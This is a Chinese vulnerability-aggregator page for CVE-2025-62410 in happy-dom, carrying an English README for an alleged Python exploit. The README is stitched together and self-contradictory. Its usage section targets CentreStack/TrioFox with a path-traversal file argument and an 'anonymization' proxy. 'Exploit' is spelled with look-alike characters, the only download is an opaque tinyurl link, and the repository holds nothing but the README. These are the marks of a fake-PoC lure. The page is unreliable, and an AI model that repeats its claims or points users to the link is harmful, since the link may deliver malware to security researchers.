关联漏洞
标题:
happy-dom 安全漏洞
(CVE-2025-62410)
描述:happy-dom是David Ortner个人开发者的一种没有图形用户界面的 web 浏览器的 JavaScript 实现。 happy-dom 20.0.2之前版本存在安全漏洞,该漏洞源于隔离不足,可能导致原型污染攻击和控制流劫持。
介绍
# CVE-2025-62410
### Overview
The vulnerability allows attackers to run untrusted scripts in the same Isolate/process, potentially enabling prototype pollution attacks that can hijack critical references like "process" or manipulate control flow by exploiting undefined property checks.
### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)
### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`
Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.
### How It Works
Attackers can potentially: - Execute arbitrary code - Hijack critical system references - Manipulate application control flow - Compromise system confidentiality, integrity, and availability The vulnerability allows network-based attacks with no user interaction required, posing a critical risk to system security.
### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-62410 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
### Download PoC explоit [here](https://tinyurl.com/muwvnp7a)
文件快照
[4.0K] /data/pocs/060b0d4a32888a9aad3a89529371d0b769aa1253
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。